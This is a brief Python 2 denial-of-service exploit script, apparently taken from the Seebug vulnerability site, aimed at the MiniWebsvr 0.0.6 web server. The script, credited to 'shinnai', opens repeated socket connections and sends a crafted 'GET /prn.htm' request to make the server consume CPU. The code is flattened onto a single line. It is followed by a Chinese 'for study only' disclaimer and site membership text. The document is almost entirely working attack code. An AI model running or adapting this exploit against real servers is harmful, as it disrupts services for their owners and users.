import socket print \"-----------------------------------------------------------------------\" print \"MiniWebsvr 0.0.6 (0-Day) Resource Consumption\" print \"url: http://miniwebsvr.sourceforge.net/\" print \"author: shinnai\" print \"mail: shinnai[at]autistici[dot]org\" print \"site: http://shinnai.altervista.org\" print \"Run this exploit and take a look to the CPU usage.\" print \"-----------------------------------------------------------------------\" host = \"127.0.0.1\" port = 80 s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) try: for i in range (0,3): request = \"GET /prn.htm HTTP/1.1 \" connection = socket.socket(socket.AF_INET, socket.SOCK_STREAM) connection.connect((host, port)) connection.send(request) print i except: print \"Unable to connect. exiting.\"
※本站提供的任何内容、代码与服务仅供学习,请勿用于非法用途,否则后果自负
您的会员可兑换次数还剩: 次 本次兑换将消耗 1 次
续费请拨打客服热线,感谢您一直支持 Seebug!
暂无评论